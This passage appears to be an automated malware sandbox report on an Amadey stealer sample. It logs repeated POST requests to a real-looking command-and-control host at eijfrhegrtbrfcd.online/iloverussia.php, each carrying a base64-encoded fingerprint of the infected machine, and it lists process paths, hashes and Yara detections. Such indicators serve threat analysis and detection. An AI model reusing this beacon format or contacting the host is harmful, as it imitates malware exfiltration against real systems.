                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:43:00 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:43:01 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:01 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VN5bMyZqnZFrkD9McMBQEKCm3wALoUnmv2uClHQXG7i4ABS0kQ1bxU%2F3L4LmxmqUvbrT%2FKnIHQfqFm5e9OBS44x4wK86rl2ik5qEFUbDM%2Bs1KB9tTaF3ZOGGam2Cp7vt3KPdsernf%2F%2Fy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b5f3f626a59-EWR
                                                                                                                                                                2024-09-27 15:43:01 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:43:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                67192.168.2.449857172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:43:01 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:43:02 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:02 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=th9qGDgv5moFGoUnhoW0ns%2BCxSeOJH5iukcHSzGFDZL7UNe3o3jUSx91f%2FyL90hc8BLhltW%2BchhF8rynvZKH8W61ZvZgdYOOlaHNpWxhKrfL65Vf4nsOgVR51jQjot97UrhO0o9fdf0m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b6579d24308-EWR
                                                                                                                                                                2024-09-27 15:43:02 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:43:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                68192.168.2.449859172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:43:02 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:43:02 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:02 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANWgBTK%2B0ZVo8htKMCMMlIyN9rvQQTChrKUwQVJM70uzUF%2BCOY5qKhAygOYvvDCnyTF7JNMSexzHJV2RDMbhpndW8cAHxzDkPUIIrzCcCVxWL1Fx7so9nY1oJviOHohBrRFO0%2FHQpuha"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b66a9ab8c93-EWR
                                                                                                                                                                2024-09-27 15:43:02 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:43:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                69192.168.2.449861172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:43:03 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:43:03 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:03 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzfFWyldnP5FEjjBYpuk%2B4a%2FV1bhwJABHYf40etqUkt2HwPDqlNBL70BfOEgFF9lTEGGVEmNd6pbKbJW94UcJdVe%2FnPodcU7aobmzRn06mq4Fxr7fNl0TexYxrHofnJSuuNyDQ61eK0k"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b6edbf34316-EWR
                                                                                                                                                                2024-09-27 15:43:03 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:43:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                70192.168.2.449862172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:43:03 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:43:03 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:03 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nc6VSoEsGz0rdET6pCB0tRR480GIB8yj8Bh8KLuQCcIdkFAfvB6zm8sJ6ip5UnVlDILnjevKsleEuT9GE2soUyO1EiCk1YPWiYad9eMoHmcFE%2FVSFc3psbB55J0Y%2BA6nmQvXnFwS6NjF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b6fbde943c4-EWR
                                                                                                                                                                2024-09-27 15:43:03 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:43:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                71192.168.2.449864172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:43:04 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:43:05 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:05 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FRLFxNHpcH8yWa3FyttQicVrwH4VBRujvlMh%2FP7dqgC4PwjvsOhTsYVP6GTatafSQoBwmEJf7wB3WY4Q7O1UZ0WkDWJMgYeOXITtOJTdGEs7UrjPD%2FjZ3%2BXhV8EqzTSJxkC6Ce23OWRL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b77ef3c436d-EWR
                                                                                                                                                                2024-09-27 15:43:05 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:43:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                72192.168.2.449867172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:43:06 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:43:06 UTC654INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:06 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lxJHbmvHj5%2F0%2BLWf2bzpwPthlqL8yuaqB%2FbFJJhZN2s7Xm31mZHhJcWmvkWbiJTYD7dBY7o2C5XyeqfVKsg0TZeY78gPbDpsaPZ%2BchBQkMKVlYmOddaIanmb2Do3bxLQYEzJYGgJljy6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b7f4d6619df-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-09-27 15:43:06 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:43:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                73192.168.2.449869172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:43:07 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:43:08 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:07 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2jvnQOmQxH5XTAZZlEN%2BF7ckDkUcjXDIzUwcPGIsadXpoKZzOm6K9vOXXQniqsZaDJAYKCvJ5wgO%2BU8mXN7xEhINWBRcSu6VH4iKKRHazGrnm0yGQea6m8erRgxs3bqpXj9LCfv1rrDm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b891fad0ce5-EWR
                                                                                                                                                                2024-09-27 15:43:08 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:43:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                74192.168.2.449872172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:43:08 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:43:09 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:43:09 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5LKcGcWPzx71kOddX4nye746q25%2F3rzVEi4tTLkE74PaO5yJz8rFk0pgW%2B7kB5T0ydNEtyMM2o9lvuB2AtVC0k%2FjVllTDnX3CzbMjumFSnHaJJW90jEoJy9oYXgvy1Xvoi9cM1HdMWC9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9b90b992434b-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                2024-09-27 15:43:09 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:43:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Statistics

                                                                                                                                                                CPU Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                Memory Usage

                                                                                                                                                                Click to jump to process

                                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:11:41:02
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                Imagebase:0x960000
                                                                                                                                                                File size:1'862'656 bytes
                                                                                                                                                                MD5 hash:DC730EEA0EBA910485703A74D173F8E2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1763005271.0000000000961000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1722139585.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:1
                                                                                                                                                                Start time:11:41:04
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                                                                                                                Imagebase:0xc20000
                                                                                                                                                                File size:1'862'656 bytes
                                                                                                                                                                MD5 hash:DC730EEA0EBA910485703A74D173F8E2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1746285062.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1789584314.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 50%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:2
                                                                                                                                                                Start time:11:41:04
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                Imagebase:0xc20000
                                                                                                                                                                File size:1'862'656 bytes
                                                                                                                                                                MD5 hash:DC730EEA0EBA910485703A74D173F8E2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1749088265.0000000005340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1789363065.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:11:42:00
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                Imagebase:0xc20000
                                                                                                                                                                File size:1'862'656 bytes
                                                                                                                                                                MD5 hash:DC730EEA0EBA910485703A74D173F8E2
                                                                                                                                                                Has elevated privileges:true
